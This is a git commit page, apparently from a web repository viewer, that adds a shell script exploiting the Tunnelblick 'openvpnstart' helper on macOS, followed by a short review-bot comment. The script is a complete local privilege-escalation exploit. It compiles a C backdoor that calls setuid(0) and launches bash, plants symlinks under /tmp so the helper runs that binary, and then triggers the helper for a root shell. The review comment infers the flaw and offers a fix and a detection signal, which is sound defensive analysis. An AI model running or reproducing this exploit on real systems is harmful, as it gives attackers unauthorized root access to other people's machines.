authorJason A. Donenfeld <Jason@zx2c4.com>2012-08-11 17:00:56 +0200
committerJason A. Donenfeld <Jason@zx2c4.com>2012-08-11 17:00:56 +0200
commit059cdebb2d51944881dd24e862f9e40b249ee0a6 (patch)
treeaab2dad25534048cf8868377184e5e653fc52db2
parentWhat's the damn program called again? (diff)
An easy shell script.
-rwxr-xr-xpwnnel-blicker-for-kids.sh28
1 files changed, 28 insertions, 0 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
new file mode 100755
index 0000000..bc1a336
--- /dev/null
+++ b/pwnnel-blicker-for-kids.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+echo "[+] Making vulnerable directory."
+mkdir -pv /tmp/pwn/openvpn/openvpn-0
+
+echo "[+] Preparing payload."
+cat > /tmp/pwn/backdoor.c <<_EOF
+#include <unistd.h>
+#include <sys/stat.h>
+#include <stdio.h>
+
+int main()
+{
+ printf("[+] Cleaning up.\n");
+ system("rm -rfv /tmp/pwn");
+ printf("[+] Getting root.\n");
+ setuid(0);
+ setgid(0);
+ execl("/bin/bash", "bash", NULL);
+}
+_EOF
+gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c
+
+echo "[+] Creating symlinks."
+ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
+ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
+
+echo "[+] Triggering vulnerable program."
+exec /tmp/pwn/start OpenVPNInfo 0
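Review bot: The script has no header comment naming the weakness it demonstrates, so a reader has to reconstruct it from the two `ln -s` lines and the final `exec`. From those lines it appears that `openvpnstart` locates the `openvpn` binary relative to the path it was invoked through rather than its real location inside the application bundle, and that it runs with elevated privileges (the embedded C calls `setuid(0)`); both are inferred, since the helper's source is not on this page. A comment directly under the shebang such as `# Demonstrates: openvpnstart trusts its invocation path (via symlink) when locating openvpn; affected version: <not stated on this page>` would record that. For defenders, the fix belongs in the helper, which should resolve its own real path and check the owner and mode of the binary before executing it. An `openvpnstart` process started through a path outside `/Applications/Tunnelblick.app` is a practical detection signal.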